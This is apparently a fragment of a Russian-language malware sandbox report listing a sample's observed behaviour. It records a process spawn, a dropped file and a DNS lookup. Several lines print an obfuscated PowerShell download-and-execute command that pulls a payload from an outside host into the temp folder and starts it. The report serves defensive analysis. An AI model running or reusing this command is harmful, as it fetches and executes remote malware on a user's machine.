Техническая информация
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl' + 'oadfile').invoke('http://flowerbedsj.top/rahatlukum/ferrari/bmw760m.php','%TEMP%\kran.exe');Star...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1916
- %TEMP%\820487.cvr
- DNS ASK fl###rbedsj.top
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl' + 'oadfile').invoke('http://flowerbedsj.top/rahatlukum/ferrari/bmw760m.php','%TEMP%\kran.exe');Star...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl' + 'oadfile').invoke('http://flowerbedsj.top/rahatlukum/ferrari/bmw760m.php','%TEMP%\kran.exe');Start '%TEMP%\kran...